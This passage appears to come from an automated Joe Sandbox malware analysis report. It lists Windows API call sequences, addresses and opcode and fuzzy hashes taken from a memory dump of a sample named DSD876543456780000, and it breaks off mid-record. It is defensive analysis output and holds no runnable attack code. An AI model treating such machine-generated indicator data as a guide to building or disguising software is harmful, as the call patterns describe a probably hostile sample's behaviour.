                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Rect$BeepClientMessageScreenWindow
                                        • String ID:
                                        • API String ID: 1352109105-0
                                        • Opcode ID: 2f6ca011d3483d085dbd36f8cb4dc427df5757ec0209119d6350aa37ccbfe9b5
                                        • Instruction ID: 949e1bc9360c7346464dcb80109b03d0e93c78845c367a9337458f6ec9b0e2dc
                                        • Opcode Fuzzy Hash: 2f6ca011d3483d085dbd36f8cb4dc427df5757ec0209119d6350aa37ccbfe9b5
                                        • Instruction Fuzzy Hash: 62418F34605214DFCB02EF59C894FAD77F5FB49318F2942A9E8249B261E730EA41DF94
                                        APIs
                                        • GetForegroundWindow.USER32 ref: 00C816EB
                                          • Part of subcall function 00C53A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C53A57
                                          • Part of subcall function 00C53A3D: GetCurrentThreadId.KERNEL32 ref: 00C53A5E
                                          • Part of subcall function 00C53A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00C525B3), ref: 00C53A65
                                        • GetCaretPos.USER32(?), ref: 00C816FF
                                        • ClientToScreen.USER32(00000000,?), ref: 00C8174C
                                        • GetForegroundWindow.USER32 ref: 00C81752
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                        • String ID:
                                        • API String ID: 2759813231-0
                                        • Opcode ID: 579bd160fe949df67c444ca1d98476efc94b1bbd50b37bfcdc9540772b86bb42
                                        • Instruction ID: 5143697b2f559d215973cb4ce61127f3c2bbe4803e618b0f542d26650087a36c
                                        • Opcode Fuzzy Hash: 579bd160fe949df67c444ca1d98476efc94b1bbd50b37bfcdc9540772b86bb42
                                        • Instruction Fuzzy Hash: 9D311E75D00149AFCB00EFA9C981DAEFBFDEF48304B5480AAE515E7211DA319E49CBA4
                                        APIs
                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00C5D501
                                        • Process32FirstW.KERNEL32(00000000,?), ref: 00C5D50F
                                        • Process32NextW.KERNEL32(00000000,?), ref: 00C5D52F
                                        • CloseHandle.KERNEL32(00000000), ref: 00C5D5DC
                                        Similarity
                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                        • String ID:
                                        • API String ID: 420147892-0
                                        • Opcode ID: e2c84bb853e2bccf2bca7c99c896e29443062708edb9c58e9dc6f872ead588a8
                                        • Instruction ID: fef2fb6da1f6816a81370de75edbf03d8c7571b0b377526a5a4b4de0c6b64b47
                                        • Opcode Fuzzy Hash: e2c84bb853e2bccf2bca7c99c896e29443062708edb9c58e9dc6f872ead588a8
                                        • Instruction Fuzzy Hash: 8531B3710083049FD310EF54C885BBFBBE8EF99394F50052DF586831A1EB719A88CBA2
                                        APIs
                                          • Part of subcall function 00C09BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00C09BB2
                                        • GetCursorPos.USER32(?), ref: 00C89001
                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00C47711,?,?,?,?,?), ref: 00C89016
                                        • GetCursorPos.USER32(?), ref: 00C8905E
                                        • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00C47711,?,?,?), ref: 00C89094
                                        Similarity
                                        • API ID: Cursor$LongMenuPopupProcTrackWindow
                                        • String ID:
                                        • API String ID: 2864067406-0
                                        • Opcode ID: 64156cb138e69615d874261420ab2ba881ed23262da1b53fc728937223274204
                                        • Instruction ID: 7250af59473ed3301cd5723c7bd7faf244298ec74daaae384fcf20dcb1e9ca0f
                                        • Opcode Fuzzy Hash: 64156cb138e69615d874261420ab2ba881ed23262da1b53fc728937223274204
                                        • Instruction Fuzzy Hash: 2821D131600018EFCB259F95CC98FFE7BB9EF4A360F184065F916972A2C7319A50EB64
                                        APIs
                                        • GetFileAttributesW.KERNEL32(?,00C8CB68), ref: 00C5D2FB
                                        • GetLastError.KERNEL32 ref: 00C5D30A
                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00C5D319
                                        • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00C8CB68), ref: 00C5D376
                                        Similarity
                                        • API ID: CreateDirectory$AttributesErrorFileLast
                                        • String ID:
                                        • API String ID: 2267087916-0
                                        • Opcode ID: 31e4948d0d473a8c06ed24ff3783629c70d80d026dc7af435228c02c58087cbc
                                        • Instruction ID: 56833a6d56a0dc3b1e599430b34bc7f675f15487cf17909065d4f11d529eb03c
                                        • Opcode Fuzzy Hash: 31e4948d0d473a8c06ed24ff3783629c70d80d026dc7af435228c02c58087cbc
                                        • Instruction Fuzzy Hash: 352180745053019F8720DF24C88196EB7E4AE56365F104A5DF8AAC72A1D730DA89CB9B
                                        APIs
                                          • Part of subcall function 00C51014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00C5102A
                                          • Part of subcall function 00C51014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00C51036
                                          • Part of subcall function 00C51014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C51045
                                          • Part of subcall function 00C51014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00C5104C
                                          • Part of subcall function 00C51014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C51062
                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00C515BE
                                        • _memcmp.LIBVCRUNTIME ref: 00C515E1
                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C51617
                                        • HeapFree.KERNEL32(00000000), ref: 00C5161E
                                        Similarity
                                        • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                        • String ID:
                                        • API String ID: 1592001646-0
                                        • Opcode ID: fd65a1fb1c2b9d580679f556105a7ad253f0ff69b6cb7c90ca15e8c23934123f
                                        • Instruction ID: ea075e1315a5fb50862f3d992fd63839a961a082969c0edcd60560cca7ce3e57
                                        • Opcode Fuzzy Hash: fd65a1fb1c2b9d580679f556105a7ad253f0ff69b6cb7c90ca15e8c23934123f
                                        • Instruction Fuzzy Hash: 4F218E31E40108EFDF00DFA4C989BEEB7B8EF44355F084459EC51A7241EB30AA89DB64
                                        APIs
                                        • GetWindowLongW.USER32(?,000000EC), ref: 00C8280A
                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00C82824
                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00C82832
                                        • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00C82840
                                        Similarity
                                        • API ID: Window$Long$AttributesLayered
                                        • String ID:
                                        • API String ID: 2169480361-0
                                        • Opcode ID: daa862ae5ebf4c0061b1d30dbe7f0006576c265590ac7e6cc7d9db46e4c52a83
                                        • Instruction ID: a03d2f0567ab1beeb4caf9c534a1bf60c344fd5396905181b0c78259d4743b03
                                        • Opcode Fuzzy Hash: daa862ae5ebf4c0061b1d30dbe7f0006576c265590ac7e6cc7d9db46e4c52a83
                                        • Instruction Fuzzy Hash: 45210331204111AFDB14AB24C898FAA7B95EF45328F14815CF4268B6E2C775FD82C794
                                        APIs
                                          • Part of subcall function 00C58D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00C5790A,?,000000FF,?,00C58754,00000000,?,0000001C,?,?), ref: 00C58D8C
                                          • Part of subcall function 00C58D7D: lstrcpyW.KERNEL32(00000000,?), ref: 00C58DB2
                                          • Part of subcall function 00C58D7D: lstrcmpiW.KERNEL32(00000000,?,00C5790A,?,000000FF,?,00C58754,00000000,?,0000001C,?,?), ref: 00C58DE3
                                        • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00C58754,00000000,?,0000001C,?,?,00000000), ref: 00C57923
                                        • lstrcpyW.KERNEL32(00000000,?), ref: 00C57949
                                        • lstrcmpiW.KERNEL32(00000002,cdecl,?,00C58754,00000000,?,0000001C,?,?,00000000), ref: 00C57984
                                        Strings
                                        Similarity
                                        • API ID: lstrcmpilstrcpylstrlen
                                        • String ID: cdecl
                                        • API String ID: 4031866154-3896280584
                                        • Opcode ID: 73f59033e2126b92fd4f2742dbf84fbb869ea45845f3cdd5a2a8f5ef08a68999
                                        • Instruction ID: b09c2e1c9d73feebf32ccb20273b12fa64abd985696f77d583313d8b403c0951
                                        • Opcode Fuzzy Hash: 73f59033e2126b92fd4f2742dbf84fbb869ea45845f3cdd5a2a8f5ef08a68999
                                        • Instruction Fuzzy Hash: DD11063E200242ABCF15AF35E844E7A77A5FF85351B00412AFC02C72A4EB319985D769
                                        APIs
                                        • GetWindowLongW.USER32(?,000000F0), ref: 00C87D0B
                                        • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00C87D2A
                                        • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00C87D42
                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00C6B7AD,00000000), ref: 00C87D6B
                                          • Part of subcall function 00C09BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00C09BB2
                                        Similarity
                                        • API ID: Window$Long
                                        • String ID:
                                        • API String ID: 847901565-0
                                        • Opcode ID: c2d36e1b09870771411f01cabcae9c090acce200a4d4a49f6c8e3814271687b8
                                        • Instruction ID: 3e54fd4fa70b0dce2fe67737f045fcfcc4d97436779c88d9d92d11dc22ea5d6f
                                        • Opcode Fuzzy Hash: c2d36e1b09870771411f01cabcae9c090acce200a4d4a49f6c8e3814271687b8
                                        • Instruction Fuzzy Hash: A711C032104614AFCB10AF29CC44F6A3BA4AF463B4B254725F835D72F0E730CA10DB54
                                        APIs
                                        • SendMessageW.USER32(?,00001060,?,00000004), ref: 00C856BB
                                        • _wcslen.LIBCMT ref: 00C856CD
                                        • _wcslen.LIBCMT ref: 00C856D8
                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00C85816
                                        Similarity
                                        • API ID: MessageSend_wcslen
                                        • String ID:
                                        • API String ID: 455545452-0
                                        • Opcode ID: 0168c5f7e8e24be575bbdf11796098a10cb78417a0f9f11d16cfdb3beb3683ef
                                        • Instruction ID: 257b6d60d6072e7e414b1c1d0b7f966edec94f46361c4d04e8cc05901325f458
                                        • Opcode Fuzzy Hash: 0168c5f7e8e24be575bbdf11796098a10cb78417a0f9f11d16cfdb3beb3683ef
                                        • Instruction Fuzzy Hash: DF11E675A0060896DF20EF62CC85BEE77ACEF51768F504126F925D6181EBF0DA84CB6C
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3fa99b96518e5a48d6d342876f16cc5e7e4b3065bf7b745de1cd98d957cfea5c
                                        • Instruction ID: 67bb8fe20bbbb6a62a4c7878a790c97dc09d886f0599bd18c27931766606b279
                                        • Opcode Fuzzy Hash: 3fa99b96518e5a48d6d342876f16cc5e7e4b3065bf7b745de1cd98d957cfea5c
                                        • Instruction Fuzzy Hash: 2601A2B220562ABEF62226787CC0F2B661CDF613B8F380325F931515D2DB708D415170
                                        APIs
                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00C51A47
                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C51A59
                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C51A6F
                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C51A8A
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID:
                                        • API String ID: 3850602802-0
                                        • Opcode ID: 72a882873d99b3b2ddf5a7bbe7f1b34180202a4045e873f0485440e0fa45fcd1
                                        • Instruction ID: efd3ee48c2b9f5d0e93e2b04d8aed97f8db6992abe18a0cb160ef9c1e23bef23
                                        • Opcode Fuzzy Hash: 72a882873d99b3b2ddf5a7bbe7f1b34180202a4045e873f0485440e0fa45fcd1
                                        • Instruction Fuzzy Hash: 10110C3AD01219FFEB11DBA5CD85FADBB78EB04750F240091EA14B7290D6716F50EB98
                                        APIs
                                        • GetCurrentThreadId.KERNEL32 ref: 00C5E1FD
                                        • MessageBoxW.USER32(?,?,?,?), ref: 00C5E230
                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00C5E246
                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00C5E24D
                                        Similarity
                                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                        • String ID:
                                        • API String ID: 2880819207-0
                                        • Opcode ID: eb095f76a4e1066b2e88970919c53c8ba8ed683c052087f38e5a84c5e0feade4
                                        • Instruction ID: 392bfaaca59c49cc5697cf1355f68f4f7082a841197b05a8424d70f6493d946c
                                        • Opcode Fuzzy Hash: eb095f76a4e1066b2e88970919c53c8ba8ed683c052087f38e5a84c5e0feade4
                                        • Instruction Fuzzy Hash: 06110876904254BBC7059FA9EC49FDE7FACDB46325F084255FC24D3292D6B08E4487B4
                                        APIs
                                        • CreateThread.KERNEL32(00000000,?,00C1CFF9,00000000,00000004,00000000), ref: 00C1D218
                                        • GetLastError.KERNEL32 ref: 00C1D224
                                        • __dosmaperr.LIBCMT ref: 00C1D22B
                                        • ResumeThread.KERNEL32(00000000), ref: 00C1D249
                                        Similarity
                                        • API ID: Thread$CreateErrorLastResume__dosmaperr
                                        • String ID:
                                        • API String ID: 173952441-0
                                        • Opcode ID: 681867b7439a71356836a66e4bf245928c92bffa360dd59073d724e3c5884168
                                        • Instruction ID: c86bfa77bff5b84d1da21aba020310a6b294dfdbc070c36a8f6f16e4be61108c
                                        • Opcode Fuzzy Hash: 681867b7439a71356836a66e4bf245928c92bffa360dd59073d724e3c5884168
                                        • Instruction Fuzzy Hash: A901D276805204BBCB115BA5DC49BEE7B69DF83731F204229F936921E0DB718D82F7A0
                                        APIs
                                        • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00BF604C
                                        • GetStockObject.GDI32(00000011), ref: 00BF6060
                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 00BF606A
                                        Similarity
                                        • API ID: CreateMessageObjectSendStockWindow
                                        • String ID:
                                        • API String ID: 3970641297-0
                                        • Opcode ID: 8f84f7c5efdbcf2d8e3a54fd4b2ef0c1f268f3ea26a59e9d70cb380ef7d5808e
                                        • Instruction ID: de9315ec90f09b4f930f0dbedefe946978c7ea8ced175a1a7d207b0080386dfc
                                        • Opcode Fuzzy Hash: 8f84f7c5efdbcf2d8e3a54fd4b2ef0c1f268f3ea26a59e9d70cb380ef7d5808e
                                        • Instruction Fuzzy Hash: F7115B7250150CBFEF164FA49C84FFEBBA9EF093A4F140255FE1552110DB329C64ABA0
                                        APIs
                                        • ___BuildCatchObject.LIBVCRUNTIME ref: 00C13B56
                                          • Part of subcall function 00C13AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00C13AD2
                                          • Part of subcall function 00C13AA3: ___AdjustPointer.LIBCMT ref: 00C13AED
                                        • _UnwindNestedFrames.LIBCMT ref: 00C13B6B
                                        • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00C13B7C
                                        • CallCatchBlock.LIBVCRUNTIME ref: 00C13BA4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                        • String ID:
                                        • API String ID: 737400349-0
                                        • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                        • Instruction ID: d875be892172ed83cbb34574c6acb7a98099e701c0467326406c672c028f34e5
                                        • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                        • Instruction Fuzzy Hash: 3C014072100188BBDF115E95CC42DEB3F6DEF4A758F044014FE5856121D732D9A1FBA0
                                        APIs
                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00BF13C6,00000000,00000000,?,00C2301A,00BF13C6,00000000,00000000,00000000,?,00C2328B,00000006,FlsSetValue), ref: 00C230A5
                                        • GetLastError.KERNEL32(?,00C2301A,00BF13C6,00000000,00000000,00000000,?,00C2328B,00000006,FlsSetValue,00C92290,FlsSetValue,00000000,00000364,?,00C22E46), ref: 00C230B1
                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00C2301A,00BF13C6,00000000,00000000,00000000,?,00C2328B,00000006,FlsSetValue,00C92290,FlsSetValue,00000000), ref: 00C230BF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: LibraryLoad$ErrorLast
                                        • String ID:
                                        • API String ID: 3177248105-0
                                        • Opcode ID: 71fbd080b81e5c95203dab8555300324410600da65651295592ee9a79549e3ea
                                        • Instruction ID: edae7466ab0c802293a11a7398df8c514b2c82b2d82089b9a4170abf0d134656
                                        • Opcode Fuzzy Hash: 71fbd080b81e5c95203dab8555300324410600da65651295592ee9a79549e3ea
                                        • Instruction Fuzzy Hash: F801F736701276ABCB314B79BC84B5B7B98AF45B61B200620F915E3580C735DA01C7F4
                                        APIs
                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 00C5747F
                                        • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00C57497
                                        • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00C574AC
                                        • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00C574CA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Type$Register$FileLoadModuleNameUser
                                        • String ID:
                                        • API String ID: 1352324309-0
                                        • Opcode ID: f32b6f49deb1a60aab4c6916569cd4753ca87d4fc200eeafbae998ec58fb9288
                                        • Instruction ID: 47f6cd5642961bfb5ff2faa5128817abed81e401e24e383379ed29d1b27f7332
                                        • Opcode Fuzzy Hash: f32b6f49deb1a60aab4c6916569cd4753ca87d4fc200eeafbae998ec58fb9288
                                        • Instruction Fuzzy Hash: E4118EB92053109BE7208F24EC48FA67BFCEB40B01F108669AA26D6151D770E9C8DF65
                                        APIs
                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00C5ACD3,?,00008000), ref: 00C5B0C4
                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00C5ACD3,?,00008000), ref: 00C5B0E9
                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00C5ACD3,?,00008000), ref: 00C5B0F3
                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00C5ACD3,?,00008000), ref: 00C5B126
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: CounterPerformanceQuerySleep
                                        • String ID:
                                        • API String ID: 2875609808-0
                                        • Opcode ID: 21bc38b77532194a291c2aa20986ff7139ff91fe8664a20a9cd101f2364c6244
                                        • Instruction ID: 0e81d6bb5a1a93d7df8d64db7141a69c12bf3b4c9cf48d532c19d26deb59e85b
                                        • Opcode Fuzzy Hash: 21bc38b77532194a291c2aa20986ff7139ff91fe8664a20a9cd101f2364c6244
                                        • Instruction Fuzzy Hash: 46113975C01928EBCF00AFA6E9987EEBF78FF4A712F104485D951B2185CB305A948B69
                                        APIs
                                        • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00C52DC5
                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00C52DD6
                                        • GetCurrentThreadId.KERNEL32 ref: 00C52DDD
                                        • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00C52DE4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                        • String ID:
                                        • API String ID: 2710830443-0
                                        • Opcode ID: e789232e246b10310fc9d98cb251364d5bff78ea850632e11f09e64f05b739a5
                                        • Instruction ID: 27765437a8ae3510d1cc635d94a18949c4e0419de0aec6531b46bf52f79f621a
                                        • Opcode Fuzzy Hash: e789232e246b10310fc9d98cb251364d5bff78ea850632e11f09e64f05b739a5
                                        • Instruction Fuzzy Hash: 83E0ED75501224BAD7201B62AC8DFEF7EACEB57BA2F400125B905D5090AAA58985C7B4
                                        APIs
                                          • Part of subcall function 00C09639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00C09693
                                          • Part of subcall function 00C09639: SelectObject.GDI32(?,00000000), ref: 00C096A2
                                          • Part of subcall function 00C09639: BeginPath.GDI32(?), ref: 00C096B9
                                          • Part of subcall function 00C09639: SelectObject.GDI32(?,00000000), ref: 00C096E2
                                        • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00C88887
                                        • LineTo.GDI32(?,?,?), ref: 00C88894
                                        • EndPath.GDI32(?), ref: 00C888A4
                                        • StrokePath.GDI32(?), ref: 00C888B2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                        • String ID:
                                        • API String ID: 1539411459-0
                                        • Opcode ID: 90c20b8ead72819339043f652af8c93771c5e7c8e0ad1b49a4f057900149978b
                                        • Instruction ID: 8fb5fc714a8318bb741e76beacb90ffe4a27ab69f96e2e8a9762f85b15e56b51
                                        • Opcode Fuzzy Hash: 90c20b8ead72819339043f652af8c93771c5e7c8e0ad1b49a4f057900149978b
                                        • Instruction Fuzzy Hash: 74F05836045258FAEB126F94AC4EFCE3F69AF06710F448000FA12650E2C7B95621DFF9
                                        APIs
                                        • GetSysColor.USER32(00000008), ref: 00C098CC
                                        • SetTextColor.GDI32(?,?), ref: 00C098D6
                                        • SetBkMode.GDI32(?,00000001), ref: 00C098E9
                                        • GetStockObject.GDI32(00000005), ref: 00C098F1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Color$ModeObjectStockText
                                        • String ID:
                                        • API String ID: 4037423528-0
                                        • Opcode ID: 14c2b375fd06834a604165357b8cf7fc7ee4f3968c609581954d0fc88aaaec25
                                        • Instruction ID: b73b0c439aefc2724b60f6b7fc37324a66d734b788d153eb5c26d9f8e345696d
                                        • Opcode Fuzzy Hash: 14c2b375fd06834a604165357b8cf7fc7ee4f3968c609581954d0fc88aaaec25
                                        • Instruction Fuzzy Hash: 80E06D31244280AEDB215B74BC8DBEC3F20FB12336F04831AF6FA580E1C37246409B20
                                        APIs
                                        • GetCurrentThread.KERNEL32 ref: 00C51634
                                        • OpenThreadToken.ADVAPI32(00000000,?,?,?,00C511D9), ref: 00C5163B
                                        • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00C511D9), ref: 00C51648
                                        • OpenProcessToken.ADVAPI32(00000000,?,?,?,00C511D9), ref: 00C5164F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
